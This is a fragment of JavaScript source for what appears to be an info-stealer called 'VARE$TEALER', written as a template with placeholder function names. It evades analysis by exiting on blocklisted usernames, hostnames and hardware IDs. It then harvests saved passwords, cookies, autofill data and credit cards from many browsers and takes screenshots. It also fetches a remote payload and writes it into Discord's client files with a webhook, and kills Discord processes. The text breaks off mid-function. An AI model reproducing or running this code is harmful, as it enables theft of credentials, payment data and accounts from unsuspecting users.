"63FA3342-31C7-4E8E-8089-DAFF6CE5E967", "64176F5E-8F74-412F-B3CF-917EFA5FB9DB", "6608003F-ECE4-494E-B07E-1C4615D1D93C", "66729280-2B0C-4BD0-8131-950D86871E54", "66CC1742-AAC7-E368-C8AE-9EEB22BD9F3B", "671BC5F7-4B0F-FF43-B923-8B1645581DC8", "67442042-0F69-367D-1B2E-1EE846020090", "67C5A563-3218-4718-8251-F38E3F6A89C1", "67E595EB-54AC-4FF0-B5E3-3DA7C7B547E3", "686D4936-87C1-4EBD-BEB7-B3D92ECA4E28", "6881083C-EE5A-43E7-B7E3-A0CE9227839C", "69AEA650-3AE3-455C-9F80-51159BAE5EAE", "6A669639-4BD2-47E5-BE03-9CBAFC9EF9B3", "6AA13342-49AB-DC46-4F28-D7BDDCE6BE32", "6ECEAF72-3548-476C-BD8D-73134A9182C8", "6F3CA5EC-BEC9-4A4D-8274-11168F640058", "71522042-DA0B-6793-668B-CE95AEA7FE21", "72492D47-52EF-427A-B623-D4F2192F97D4", "73163342-B704-86D5-519B-18E1D191335C", "777D84B3-88D1-451C-93E4-D235177420A7", "782ED390-AE10-4727-A866-07018A8DED22", "79AF5279-16CF-4094-9758-F88A616D81B4", "7A484800-3B19-11EA-8000-3CECEF440122", "7AB5C494-39F5-4941-9163-47F54D6D5016", "7CA33342-A88C-7CD1-1ABB-7C0A82F488BF", "7D341C16-E8E9-42EA-8779-93653D877231", "7D6A0A6D-394E-4179-9636-662A8D2C7304", "7E4755A6-7160-4982-8F5D-6AA481749F10", "80152042-2F34-11D1-441F-5FADCA01996D", "83BFD600-3C27-11EA-8000-3CECEF4400B4", "844703CF-AA4E-49F3-9D5C-74B8D1F5DCB6", "84782042-E646-50A0-159F-A8E75D4F9402", "84FE3342-6C67-5FC6-5639-9B3CA3D775A1", "84FEEFBC-805F-4C0E-AD5B-A0042999134D", "8703841B-3C5E-461C-BE72-1747D651CE89", "88DC3342-12E6-7D62-B0AE-C80E578E7B07", "8B4E8278-525C-7343-B825-280AEBCD3BCB", "8DA62042-8B59-B4E3-D232-38B29A10964A", "8EC60B88-7F2B-42DA-B8C3-4E2EF2A8C603", "907A2A79-7116-4CB6-9FA5-E5A58C4587CD", "90A83342-D7E7-7A14-FFB3-2AA345FDBC89", "91625303-5211-4AAC-9842-01A41BA60D5A", "91A9EEDB-4652-4453-AC5B-8E92E68CBCF5", "921E2042-70D3-F9F1-8CBD-B398A21F89C6", "94515D88-D62B-498A-BA7C-3614B5D4307C", "95BF6A00-3C63-11EA-8000-3CECEF43FEB8", "96BB3342-6335-0FA8-BA29-E1BA5D8FEFBE", "9921DE3A-5C1A-DF11-9078-563412000026", "9B2F7E00-6F4C-11EA-8000-3CECEF467028", "9C6D1742-046D-BC94-ED09-C36F70CC9A91", "9FC997CA-5081-4751-BC78-CE56D06F6A62", "A100EFD7-4A31-458F-B7FE-2EF95162B32F", "A15A930C-8251-9645-AF63-E45AD728C20C", "A19323DA-80B2-48C9-9F8F-B21D08C3FE07", "A1A849F7-0D57-4AD3-9073-C79D274EECC8", "A2339E80-BB69-4BF5-84BC-E9BE9D574A65", "A5CE2042-8D25-24C4-71F7-F56309D7D45F", "A6A21742-8023-CED9-EA8D-8F0BC4B35DEA", "A7721742-BE24-8A1C-B859-D7F8251A83D3", "A9C83342-4800-0578-1EE8-BA26D2A678D2", "AAFC2042-4721-4E22-F795-A60296CAC029", "ACA69200-3C4C-11EA-8000-3CECEF4401AA", "ADEEEE9E-EF0A-6B84-B14B-B83A54AFC548", "AF1B2042-4B90-0000-A4E4-632A1C8C7EB1", "B1112042-52E8-E25B-3655-6A4F54155DBF", "B22B623B-6B62-4F9B-A9D3-94A15453CEF4", "B5B77895-D40B-4F30-A565-6EF72586A14A", "B6464A2B-92C7-4B95-A2D0-E5410081B812", "B9DA2042-0D7B-F938-8E8A-DA098462AAEC", "BB233342-2E01-718F-D4A1-E7F69D026428", "BB64E044-87BA-C847-BC0A-C797D1A16A50", "BE784D56-81F5-2C8D-9D4B-5AB56F05D86E", "BFE62042-E4E1-0B20-6076-C5D83EDFAFCE", "C0342042-AF96-18EE-C570-A5EFA8FF8890", "C249957A-AA08-4B21-933F-9271BEC63C85", "C364B4FE-F1C1-4F2D-8424-CB9BD735EF6E", "C51E9A00-3BC3-11EA-8000-3CECEF440034", "C6B32042-4EC3-6FDF-C725-6F63914DA7C7", "C7D23342-A5D4-68A1-59AC-CF40F735B363", "C9283342-8499-721F-12BE-32A556C9A7A8", "CC4AB400-3C66-11EA-8000-3CECEF43FE56", "CC5B3F62-2A04-4D2E-A46C-AA41B7050712", "CD74107E-444E-11EB-BA3A-E3FDD4B29537", "CE352E42-9339-8484-293A-BD50CDC639A5", "CEFC836C-8CB1-45A6-ADD7-209085EE2A57", "CF1BE00F-4AAF-455E-8DCD-B5B09B6BFA8F", "D2DC3342-396C-6737-A8F6-0C6673C1DE08", "D4260370-C9F1-4195-95A8-585611AE73F2", "D4C44C15-4BAE-469B-B8FD-86E5C7EB89AB", "D5DD3342-46B5-298A-2E81-5CA6867168BE", "D7382042-00A0-A6F0-1E51-FD1BBF06CD71", "D7958D98-A51E-4B34-8C51-547A6C2E6615", "D8C30328-1B06-4611-8E3C-E433F4F9794E", "D9142042-8F51-5EFF-D5F8-EE9AE3D1602A", "DBC22E42-59F7-1329-D9F2-E78A2EE5BD0D", "DBCC3514-FA57-477D-9D1F-1CAF4CC92D0F", "DD45F600-3C63-11EA-8000-3CECEF440156", "DD9C3342-FB80-9A31-EB04-5794E5AE2B4C", "DEAEB8CE-A573-9F48-BD40-62ED6C223F20", "E08DE9AA-C704-4261-B32D-57B2A3993518", "E0C806ED-B25A-4744-AD7D-59771187122E", "E1BA2E42-EFB1-CDFD-7A84-8A39F747E0C5", "E2342042-A1F8-3DCF-0182-0E63D607BCC7", "E3BB3342-02A8-5613-9C92-3747616194FD", "E57F6333-A2AC-4F65-B442-20E928C0A625", "E67640B3-2B34-4D7F-BD62-59A1822DDBDC", "E6DBCCDF-5082-4479-B61A-6990D92ACC5F", "E773CC89-EFB8-4DB6-A46E-6CCA20FE4E1A", "EADD1742-4807-00A0-F92E-CCD933E9D8C1", "EB16924B-FB6D-4FA1-8666-17B91F62FB37", "F3EA4E00-3C5F-11EA-8000-3CECEF440016", "F5744000-3C78-11EA-8000-3CECEF43FEFE", "F5BB1742-D36D-A11E-6580-2EA2427B0038", "F5EFEEAC-96A0-11EB-8365-FAFE299935A9", "F68B2042-E3A7-2ADA-ADBC-A6274307A317", "F705420F-0BB3-4688-B75C-6CD1352CABA9", "F91C9458-6656-4E83-B84A-13641DE92949", "F9E41000-3B35-11EA-8000-3CECEF440150", "FA612E42-DC79-4F91-CA17-1538AD635C95", "FA8C2042-205D-13B0-FCB5-C5CC55577A35", "FBC62042-5DE9-16AD-3F27-F818E5F68DD3", "FC40ACF8-DD97-4590-B605-83B595B0C4BA", "FCE23342-91F1-EAFC-BA97-5AAE4509E173", "FE455D1A-BE27-4BA4-96C8-967A6D3A9661", "FED63342-E0D6-C669-D53F-253D696D74DA", "FF577B79-782E-0A4D-8568-B35A9B7EB76B", "9CFF2042-2043-0340-4F9C-4BAE6DC5BB39", "D7AC2042-05F8-0037-54A6-38387D00B767", "52562042-B33F-C9D3-0149-241F40A0F5D8", "3E9AC505-812A-456F-A9E6-C7426582500E", "11E12042-2404-040A-31E4-27374099F748", "6E963342-B9C8-2D14-B057-C60C35722AD4", "9EB0FAF6-0713-4576-BD64-813DEE9E477E", "0B8A2042-2E8E-BECC-B6A4-7925F2163DC9", "89E32042-1B2B-5C76-E966-D4E363846FD4", "699400A5-AFC6-427A-A56F-CE63D3E121CB", "2F230ED7-5797-4DB2-BAA0-99A193503E4B"]
1116 | var pcuserblack = ["05h00Gi0", "3u2v9m8", "43By4", "4tgiizsLimS", "6O4KyHhJXBiR", "7wjlGX7PjlW4", "8Nl0ColNQ5bq", "8VizSM", "Abby", "Amy", "AppOnFlySupport", "ASPNET", "azure", "BUiA1hkm", "BvJChRPnsxn", "cM0uEGN4do", "cMkNdS6", "DefaultAccount", "dOuyo8RV71", "DVrzi", "e60UW", "ecVtZ5wE", "EGG0p", "Frank", "fred", "G2DbYLDgzz8Y", "george", "GjBsjb", "Guest", "h7dk1xPr", "h86LHD", "Harry Johnson", "HEUeRzl", "hmarc", "ICQja5iT", "IVwoKUF", "j6SHA37KA", "j7pNjWM", "John", "jude", "Julia", "kEecfMwgj", "kFu0lQwgX5P", "KUv3bT4", "Lisa", "lK3zMR", "lmVwjj9b", "Louise", "Lucas", "mike", "Mr.None", "noK4zG7ZhOf", "o6jdigq", "o8yTi52T", "OgJb6GqgK0O", "patex", "PateX", "Paul Jones", "pf5vj", "PgfV1X", "PqONjHVwexsS", "pWOuqdTDQ", "PxmdUOpVyx", "QfofoG", "QmIS5df7u", "QORxJKNk", "qZo9A", "RDhJ0CNFevzX", "RGzcBUyrznReg", "S7Wjuf", "server", "SqgFOf3G", "Steve", "test", "TVM", "txWas1m2t", "umyUJ", "Uox1tzaMO", "User01", "w0fjuOVmCcP5A", "WDAGUtilityAccount", "XMiMmcKziitD", "xPLyvzr8sgC", "ykj0egq7fze", "DdQrgc", "ryjIJKIrOMs", "nZAp7UBVaS1", "zOEsT", "l3cnbB8Ar5b8", "xUnUy", "fNBDSlDTXY", "vzY4jmH0Jw02", "gu17B", "UiQcX", "21zLucUnfI85", "OZFUCOD6", "8LnfAai9QdJR", "5sIBK", "rB5BnfuR2", "GexwjQdjXG", "IZZuXj", "ymONofg", "dxd8DJ7c", "JAW4Dz0", "GJAm1NxXVm", "UspG1y1C", "equZE3J", "BXw7q", "lubi53aN14cU", "5Y3y73", "9yjCPsEYIMH", "GGw8NR", "JcOtj17dZx", "05KvAUQKPQ", "64F2tKIqO5", "7DBgdxu", "uHUQIuwoEFU", "gL50ksOp", "Of20XqH4VL", "tHiF2T", "sal.rosenburg"];
1117 | var hostnameblack = ["373836","00900BC83803", "0CC47AC83803", "6C4E733F-C2D9-4", "ACEPC", "AIDANPC", "ALENMOOS-PC", "ALIONE", "APPONFLY-VPS", "ARCHIBALDPC", "azure", "B30F0242-1C6A-4", "BAROSINO-PC", "BECKER-PC", "BEE7370C-8C0C-4", "COFFEE-SHOP", "COMPNAME_4047", "d1bnJkfVlH", "DESKTOP-19OLLTD", "DESKTOP-1PYKP29", "DESKTOP-1Y2433R", "DESKTOP-4U8DTF8", "DESKTOP-54XGX6F", "DESKTOP-5OV9S0O", "DESKTOP-6AKQQAM", "DESKTOP-6BMFT65", "DESKTOP-70T5SDX", "DESKTOP-7AFSTDP", "DESKTOP-7XC6GEZ", "DESKTOP-8K9D93B", "DESKTOP-AHGXKTV", "DESKTOP-ALBERTO", "DESKTOP-B0T93D6", "DESKTOP-BGN5L8Y", "DESKTOP-BUGIO", "DESKTOP-BXJYAEC", "DESKTOP-CBGPFEE", "DESKTOP-CDQE7VN", "DESKTOP-CHAYANN", "DESKTOP-CM0DAW8", "DESKTOP-CNFVLMW", "DESKTOP-CRCCCOT", "DESKTOP-D019GDM", "DESKTOP-D4FEN3M", "DESKTOP-DE369SE", "DESKTOP-DIL6IYA", "DESKTOP-ECWZXY2", "DESKTOP-F7BGEN9", "DESKTOP-FSHHZLJ", "DESKTOP-G4CWFLF", "DESKTOP-GELATOR", "DESKTOP-GLBAZXT", "DESKTOP-GNQZM0O", "DESKTOP-GPPK5VQ", "DESKTOP-HASANLO", "DESKTOP-HQLUWFA", "DESKTOP-HSS0DJ9", "DESKTOP-IAPKN1P", "DESKTOP-IFCAQVL", "DESKTOP-ION5ZSB", "DESKTOP-JQPIFWD", "DESKTOP-KALVINO", "DESKTOP-KOKOVSK", "DESKTOP-NAKFFMT", "DESKTOP-NKP0I4P", "DESKTOP-NM1ZPLG", "DESKTOP-NTU7VUO", "DESKTOP-QUAY8GS", "DESKTOP-RCA3QWX", "DESKTOP-RHXDKWW", "DESKTOP-S1LFPHO", "DESKTOP-SUPERIO", "DESKTOP-V1L26J5", "DESKTOP-VIRENDO", "DESKTOP-VKNFFB6", "DESKTOP-VRSQLAG", "DESKTOP-VWJU7MF", "DESKTOP-VZ5ZSYI", "DESKTOP-W8JLV9V", "DESKTOP-WG3MYJS", "DESKTOP-WI8CLET", "DESKTOP-XOY7MHS", "DESKTOP-Y8ASUIL", "DESKTOP-YW9UO1H", "DESKTOP-ZJF9KAN", "DESKTOP-ZMYEHDA", "DESKTOP-ZNCAEAM", "DESKTOP-ZOJJ8KL", "DESKTOP-ZV9GVYL", "DOMIC-DESKTOP", "EA8C2E2A-D017-4", "ESPNHOOL", "GANGISTAN", "GBQHURCC", "GRAFPC", "GRXNNIIE", "gYyZc9HZCYhRLNg", "JBYQTQBO", "JERRY-TRUJILLO", "JOHN-PC", "JUDES-DOJO", "JULIA-PC", "LANTECH-LLC", "LISA-PC", "LOUISE-PC", "LUCAS-PC", "MIKE-PC", "NETTYPC", "ORELEEPC", "ORXGKKZC", "Paul Jones", "PC-DANIELE", "PROPERTY-LTD", "Q9IATRKPRH", "QarZhrdBpj", "RALPHS-PC", "SERVER-PC", "SERVER1", "Steve", "SYKGUIDE-WS17", "T00917", "test42", "TIQIYLA9TW5M", "TMKNGOMU", "TVM-PC", "VONRAHEL", "WILEYPC", "WIN-5E07COS9ALR", "WINDOWS-EEL53SN", "WINZDS-1BHRVPQU", "WINZDS-22URJIBV", "WINZDS-3FF2I9SN", "WINZDS-5J75DTHH", "WINZDS-6TUIHN7R", "WINZDS-8MAEI8E4", "WINZDS-9IO75SVG", "WINZDS-AM76HPK2", "WINZDS-B03L9CEO", "WINZDS-BMSMD8ME", "WINZDS-BUAOKGG1", "WINZDS-K7VIK4FC", "WINZDS-QNGKGN59", "WINZDS-RST0E8VU", "WINZDS-U95191IG", "WINZDS-VQH86L5D", "WORK", "XC64ZB", "XGNSVODU", "ZELJAVA", "3CECEFC83806", "C81F66C83805", "DESKTOP-USLVD7G", "DESKTOP-AUPFKSY", "DESKTOP-RP4FIBL", "DESKTOP-6UJBD2J", "DESKTOP-LTMCKLA", "DESKTOP-FLTWYYU", "DESKTOP-WA2BY3L", "DESKTOP-UBDJJ0A", "DESKTOP-KXP5YFO", "DESKTOP-DAU8GJ2", "DESKTOP-FCRB3FM", "DESKTOP-VYRNO7M", "DESKTOP-PKQNDSR", "DESKTOP-SCNDJWE", "DESKTOP-RSNLFZS", "DESKTOP-MWFRVKH", "DESKTOP-QLN2VUF", "DESKTOP-62YPFIQ", "DESKTOP-PA0FNV5", "DESKTOP-B9OARKC", "DESKTOP-J5XGGXR", "DESKTOP-JHUHOTB", "DESKTOP-64ACUCH", "DESKTOP-SUNDMI5", "DESKTOP-GCN6MIO", "FERREIRA-W10", "DESKTOP-MJC6500", "DESKTOP-WS7PPR2", "DESKTOP-XWQ5FUV", "DESKTOP-UHHSY4R", "DESKTOP-ZJRWGX5", "DESKTOP-ZYQYSRD", "WINZDS-MILOBM35", "DESKTOP-K8Y2SAM", "DESKTOP-4GCZVJU", "DESKTOP-O6FBMF7", "DESKTOP-WDT1SL6", "EIEEIFYE", "CRYPTODEV222222", "EFA0FDEC-8FA7-4"];
1118 |
1119 | if (pcuserblack.includes(os.userInfo().username)) {
1120 | process.exit(1);
1121 | }
1122 | if (hostnameblack.includes(os.hostname())) {
1123 | process.exit(1);
1124 | }
1125 | if (hwidblack.includes(hwid)) {
1126 | process.exit(1);
1127 | }
1128 | await %VARESTARTUP%()
1129 | await %VAREUSERDATA%()
1130 | await %VARESCREENSHOT%().then(res => {
1131 | fs.access(appdata +`\\${cr}_${os.hostname}${random}${random}\\[VARE] User\\screenshot.png`, fs.constants.F_OK, (err) => {
1132 | if (err) {
1133 | %VARESCREENSHOT%()
1134 | return;
1135 | }
1136 | });
1137 | })
1138 | await %VAREALLCOOKIES%()
1139 | await %VAREALLPASS%()
1140 | await %VAREALLAUTOFILL%()
1141 | await %VAREALLCCS%()
1142 | await %SENDLOGS%()
1143 | await %VARESLEEP%(5000)
1144 | await %DISCORDINJ%()
1145 | await %VARESTEALTOKEN%()
1146 | }
1147 |
1148 |
1149 | async function %VAREALLCCS%() {
1150 | let cr = await %GETCOUNTRY%();
1151 | fs.mkdir(process.env.APPDATA + `\\${cr}_${os.hostname}${random}${random}`, (err) => {
1152 | });
1153 | fs.mkdir(process.env.APPDATA + `\\${cr}_${os.hostname}${random}${random}\\[VARE] Cards\\`, (err) => {
1154 | });
1155 | let creditcards = '';
1156 | for (let i = 0; i < paths.length; i++) {
1157 | if (fs.existsSync(paths[i] + 'Web Data'))
1158 | creditcards += await %VARECARDS%(paths[i]) || '';
1159 | }
1160 | if (!creditcards.includes('NUMBER:')) creditcards = '~|~|~ VARE$TEALER ~|~|~\n Creditcards not found. '
1161 | else creditcards = creditcards.slice(2)
1162 |
1163 | fs.writeFileSync(process.env.APPDATA + `\\${cr}_${os.hostname}${random}${random}\\[VARE] Cards\\ALL Cards.txt`, creditcards)
1164 |
1165 | }
1166 |
1167 |
1168 | async function %VAREALLPASS%() {
1169 | let country = await %GETCOUNTRY%();
1170 | fs.mkdir(process.env.APPDATA + `\\${country}_${os.hostname}${random}${random}`, (err) => {
1171 | });
1172 | fs.mkdir(process.env.APPDATA + `\\${country}_${os.hostname}${random}${random}\\[VARE] Passwords\\`, (err) => {
1173 | });
1174 | let appData = process.env.APPDATA;
1175 | let localAppData = process.env.LOCALAPPDATA;
1176 | let passwords = '';
1177 | for (let i = 0; i < paths.length; i++) {
1178 | if (fs.existsSync(paths[i] + 'Login Data')) {
1179 | passwords += await %VAREPASS%(paths[i]) || '';
1180 | }
1181 | }
1182 | fs.writeFile(process.env.APPDATA + `\\${country}_${os.hostname}${random}${random}\\[VARE] Passwords\\ALL Passwords.txt`, passwords, function (err, data) {
1183 | if (err) throw err;
1184 | });
1185 | }
1186 |
1187 | async function %VAREALLCOOKIES%() {
1188 | let founds = [];
1189 | let cr = await %GETCOUNTRY%();
1190 | let appdata = process.env.APPDATA;
1191 | let localappdata = process.env.LOCALAPPDATA;
1192 | let cookiepaths = {
1193 | 'Opera': appdata + '\\Opera Software\\Opera Stable\\',
1194 | 'Opera GX': appdata + '\\Opera Software\\Opera GX Stable\\',
1195 | 'Amigo': localappdata + '\\Amigo\\User Data\\',
1196 | 'Torch': localappdata + '\\Torch\\User Data\\',
1197 | 'Kometa': localappdata + '\\Kometa\\User Data\\',
1198 | 'Orbitum': localappdata + '\\Orbitum\\User Data\\',
1199 | 'CentBrowser': localappdata + '\\CentBrowser\\User Data\\',
1200 | '7Star': localappdata + '\\7Star\\7Star\\User Data\\',
1201 | 'Sputnik': localappdata + '\\Sputnik\\Sputnik\\User Data\\',
1202 | 'Vivaldi': localappdata + '\\Vivaldi\\User Data\\Default\\',
1203 | 'Chrome SxS': localappdata + '\\Google\\Chrome SxS\\User Data\\',
1204 | 'Chrome': localappdata + '\\Google\\Chrome\\User Data\\Default\\',
1205 | 'Epic Privacy Browser': localappdata + '\\Epic Privacy Browser\\User Data\\',
1206 | 'Microsoft Edge': localappdata + '\\Microsoft\\Edge\\User Data\\Default\\',
1207 | 'Uran': localappdata + '\\uCozMedia\\Uran\\User Data\\Default\\',
1208 | 'Microsoft Edge': localappdata + '\\Microsoft\\Edge\\User Data\\Default\\',
1209 | 'Microsoft Edge Profile 1': localappdata + '\\Microsoft\\Edge\\User Data\\Profile 1\\',
1210 | 'Microsoft Edge Profile 2': localappdata + '\\Microsoft\\Edge\\User Data\\Profile 2\\',
1211 | 'Microsoft Edge Profile 3': localappdata + '\\Microsoft\\Edge\\User Data\\Profile 3\\',
1212 | 'Microsoft Edge Profile 4': localappdata + '\\Microsoft\\Edge\\User Data\\Profile 4\\',
1213 | 'Microsoft Edge Profile 5': localappdata + '\\Microsoft\\Edge\\User Data\\Profile 5\\',
1214 | 'Microsoft Edge Guest': localappdata + '\\Microsoft\\Edge\\User Data\\Guest Profile\\',
1215 | 'Yandex': localappdata + '\\Yandex\\YandexBrowser\\User Data\\Default\\',
1216 | 'Yandex Profile 1': localappdata + '\\Yandex\\YandexBrowser\\User Data\\Profile 1\\',
1217 | 'Yandex Profile 2': localappdata + '\\Yandex\\YandexBrowser\\User Data\\Profile 2\\',
1218 | 'Yandex Profile 3': localappdata + '\\Yandex\\YandexBrowser\\User Data\\Profile 3\\',
1219 | 'Yandex Profile 4': localappdata + '\\Yandex\\YandexBrowser\\User Data\\Profile 4\\',
1220 | 'Yandex Profile 5': localappdata + '\\Yandex\\YandexBrowser\\User Data\\Profile 5\\',
1221 | 'Yandex Guest': localappdata + '\\Yandex\\YandexBrowser\\User Data\\Guest Profile\\',
1222 | 'Iridium': localappdata + '\\Iridium\\User Data\\Default\\',
1223 | 'Chrome Profile 1': localappdata + '\\Google\\Chrome\\User Data\\Profile 1\\',
1224 | 'Chrome Profile 2': localappdata + '\\Google\\Chrome\\User Data\\Profile 2\\',
1225 | 'Chrome Profile 3': localappdata + '\\Google\\Chrome\\User Data\\Profile 3\\',
1226 | 'Chrome Profile 4': localappdata + '\\Google\\Chrome\\User Data\\Profile 4\\',
1227 | 'Chrome Profile 5': localappdata + '\\Google\\Chrome\\User Data\\Profile 5\\',
1228 | 'Chrome Guest ':localappdata + '\\Google\\Chrome\\User Data\\Guest Profile\\',
1229 | 'Brave':localappdata + '\\BraveSoftware\\Brave-Browser\\User Data\\Default\\',
1230 | 'Brave Profile 1':localappdata + '\\BraveSoftware\\Brave-Browser\\User Data\\Profile 1\\',
1231 | 'Brave Profile 2':localappdata + '\\BraveSoftware\\Brave-Browser\\User Data\\Profile 2\\',
1232 | 'Brave Profile 3':localappdata + '\\BraveSoftware\\Brave-Browser\\User Data\\Profile 3\\',
1233 | 'Brave Profile 4':localappdata + '\\BraveSoftware\\Brave-Browser\\User Data\\Profile 4\\',
1234 | 'Brave Profile 5':localappdata + '\\BraveSoftware\\Brave-Browser\\User Data\\Profile 5\\',
1235 | 'Brave Guest':localappdata + '\\BraveSoftware\\Brave-Browser\\User Data\\Guest Profile\\',
1236 | };
1237 | fs.mkdir(process.env.APPDATA + `\\${cr}_${os.hostname}${random}${random}`, (err) => {
1238 |
1239 | });
1240 | fs.mkdir(process.env.APPDATA + `\\${cr}_${os.hostname}${random}${random}\\[VARE] Cookies\\`, (err) => {
1241 | });
1242 | for (let browser in cookiepaths) {
1243 | let path = cookiepaths[browser];
1244 | let cookies = await %VARECOOKIES%(path);
1245 | if (cookies && cookies != '~|~|~ VARE$TEALER ~|~|~ \n') {
1246 | %keywordstring%.forEach((keyword) => {
1247 | if (cookies.includes(keyword)) {
1248 | if (!founds[browser]) {
1249 | founds[browser] = [];
1250 | }
1251 | founds[browser].push(keyword);
1252 | }
1253 | });
1254 | %keywordstring%.forEach((keyword) => {
1255 | if (cookies.includes(keyword)) {
1256 | if (!all_founds) {
1257 | all_founds = [];
1258 | }
1259 | all_founds.push(keyword);
1260 | }
1261 | });
1262 | try {
1263 | let browserCookies = `founded Keywords : ${founds[browser]}\n\n${cookies}`;
1264 | fs.writeFileSync(`${appdata}\\${cr}_${os.hostname}${random}${random}\\[VARE] Cookies\\${browser}.txt`, browserCookies);
1265 | } catch (err) {
1266 | }
1267 | }
1268 | }
1269 |
1270 | }
1271 |
1272 | async function %VAREALLAUTOFILL%() {
1273 | let cr = await %GETCOUNTRY%();
1274 | let appdata = process.env.APPDATA;
1275 | let localappdata = process.env.LOCALAPPDATA;
1276 | let autofillpaths = {
1277 | 'Opera': appdata + '\\Opera Software\\Opera Stable\\',
1278 | 'Opera GX': appdata + '\\Opera Software\\Opera GX Stable\\',
1279 | 'Amigo': localappdata + '\\Amigo\\User Data\\',
1280 | 'Torch': localappdata + '\\Torch\\User Data\\',
1281 | 'Kometa': localappdata + '\\Kometa\\User Data\\',
1282 | 'Orbitum': localappdata + '\\Orbitum\\User Data\\',
1283 | 'CentBrowser': localappdata + '\\CentBrowser\\User Data\\',
1284 | '7Star': localappdata + '\\7Star\\7Star\\User Data\\',
1285 | 'Sputnik': localappdata + '\\Sputnik\\Sputnik\\User Data\\',
1286 | 'Vivaldi': localappdata + '\\Vivaldi\\User Data\\Default\\',
1287 | 'Chrome SxS': localappdata + '\\Google\\Chrome SxS\\User Data\\',
1288 | 'Chrome': localappdata + '\\Google\\Chrome\\User Data\\Default\\',
1289 | 'Epic Privacy Browser': localappdata + '\\Epic Privacy Browser\\User Data\\',
1290 | 'Microsoft Edge': localappdata + '\\Microsoft\\Edge\\User Data\\Default\\',
1291 | 'Uran': localappdata + '\\uCozMedia\\Uran\\User Data\\Default\\',
1292 | 'Microsoft Edge': localappdata + '\\Microsoft\\Edge\\User Data\\Default\\',
1293 | 'Microsoft Edge Profile 1': localappdata + '\\Microsoft\\Edge\\User Data\\Profile 1\\',
1294 | 'Microsoft Edge Profile 2': localappdata + '\\Microsoft\\Edge\\User Data\\Profile 2\\',
1295 | 'Microsoft Edge Profile 3': localappdata + '\\Microsoft\\Edge\\User Data\\Profile 3\\',
1296 | 'Microsoft Edge Profile 4': localappdata + '\\Microsoft\\Edge\\User Data\\Profile 4\\',
1297 | 'Microsoft Edge Profile 5': localappdata + '\\Microsoft\\Edge\\User Data\\Profile 5\\',
1298 | 'Microsoft Edge Guest': localappdata + '\\Microsoft\\Edge\\User Data\\Guest Profile\\',
1299 | 'Yandex': localappdata + '\\Yandex\\YandexBrowser\\User Data\\Default\\',
1300 | 'Yandex Profile 1': localappdata + '\\Yandex\\YandexBrowser\\User Data\\Profile 1\\',
1301 | 'Yandex Profile 2': localappdata + '\\Yandex\\YandexBrowser\\User Data\\Profile 2\\',
1302 | 'Yandex Profile 3': localappdata + '\\Yandex\\YandexBrowser\\User Data\\Profile 3\\',
1303 | 'Yandex Profile 4': localappdata + '\\Yandex\\YandexBrowser\\User Data\\Profile 4\\',
1304 | 'Yandex Profile 5': localappdata + '\\Yandex\\YandexBrowser\\User Data\\Profile 5\\',
1305 | 'Yandex Guest': localappdata + '\\Yandex\\YandexBrowser\\User Data\\Guest Profile\\',
1306 | 'Iridium': localappdata + '\\Iridium\\User Data\\Default\\',
1307 | 'Chrome Profile 1': localappdata + '\\Google\\Chrome\\User Data\\Profile 1\\',
1308 | 'Chrome Profile 2': localappdata + '\\Google\\Chrome\\User Data\\Profile 2\\',
1309 | 'Chrome Profile 3': localappdata + '\\Google\\Chrome\\User Data\\Profile 3\\',
1310 | 'Chrome Profile 4': localappdata + '\\Google\\Chrome\\User Data\\Profile 4\\',
1311 | 'Chrome Profile 5': localappdata + '\\Google\\Chrome\\User Data\\Profile 5\\',
1312 | 'Chrome Guest ':localappdata + '\\Google\\Chrome\\User Data\\Guest Profile\\',
1313 | 'Brave':localappdata + '\\BraveSoftware\\Brave-Browser\\User Data\\Default\\',
1314 | 'Brave Profile 1':localappdata + '\\BraveSoftware\\Brave-Browser\\User Data\\Profile 1\\',
1315 | 'Brave Profile 2':localappdata + '\\BraveSoftware\\Brave-Browser\\User Data\\Profile 2\\',
1316 | 'Brave Profile 3':localappdata + '\\BraveSoftware\\Brave-Browser\\User Data\\Profile 3\\',
1317 | 'Brave Profile 4':localappdata + '\\BraveSoftware\\Brave-Browser\\User Data\\Profile 4\\',
1318 | 'Brave Profile 5':localappdata + '\\BraveSoftware\\Brave-Browser\\User Data\\Profile 5\\',
1319 | 'Brave Guest':localappdata + '\\BraveSoftware\\Brave-Browser\\User Data\\Guest Profile\\',
1320 | };
1321 | fs.mkdir(process.env.APPDATA + `\\${cr}_${os.hostname}${random}${random}`, (err) => {
1322 |
1323 | });
1324 | fs.mkdir(process.env.APPDATA + `\\${cr}_${os.hostname}${random}${random}\\[VARE] AutoFill\\`, (err) => {
1325 | });
1326 | try {
1327 | for (let browser in autofillpaths) {
1328 | let path = autofillpaths[browser];
1329 | let data = await %VAREAUTOFILL%(path);
1330 | if (data) {
1331 | fs.writeFileSync( appdata + `\\${cr}_${os.hostname}${random}${random}\\[VARE] AutoFill\\` + browser + ".txt", data);
1332 |
1333 | } else {
1334 | }
1335 | }
1336 | }catch{}
1337 |
1338 | }
1339 |
1340 | function %FINDINDEX%(firstpath) {
1341 | let dcpaths = fs.readdirSync(firstpath);
1342 | dcpaths.forEach((file) => {
1343 | let filePath = path.join(firstpath, file);
1344 | let fileStat = fs.statSync(filePath);
1345 | if (fileStat.isDirectory()) {
1346 | %FINDINDEX%(filePath);
1347 | } else {
1348 | if (file === "index.js" &&
1349 | !firstpath.includes("node_modules") &&
1350 | firstpath.includes("desktop_core")) {
1351 | injectPath.push(filePath);
1352 | }
1353 | }
1354 | });
1355 | }
1356 |
1357 | async function %FINDINJ%(firstpath) {
1358 | const files = await fs.promises.readdir(firstpath);
1359 | for (const file of files) {
1360 | const filePath = path.join(firstpath, file);
1361 | const fileStat = await fs.promises.stat(filePath);
1362 | if (fileStat.isDirectory()) {
1363 | if (file === 'vare') {
1364 | await fs.rmdirSync(filePath);
1365 | } else {
1366 | await %FINDINJ%(filePath);
1367 | }
1368 | }
1369 | }
1370 | }
1371 |
1372 | function %INJECTT%() {
1373 | axios.get(%INJURLL%)
1374 | .then(response => {
1375 | let data = response.data;
1376 | injectPath.forEach(file => {
1377 | fs.writeFileSync(file, data.replace("%WEBHOOK%", %webhookstring%), {
1378 | encoding: 'utf8',
1379 | flag: 'w'
1380 | });
1381 | });
1382 | })
1383 | .catch(error => {
1384 | console.log(error);
1385 | });
1386 | };
1387 |
1388 | async function %KILLDC%() {
1389 | var clients = [
1390 | 'Discord.exe',
1391 | 'DiscordCanary.exe',
1392 | 'discordDevelopment.exe',
1393 | 'DiscordPTB.exe'
1394 | ]
1395 | await exec('tasklist', async (err, stdout, stderr) => {
1396 | for (const client of clients) {
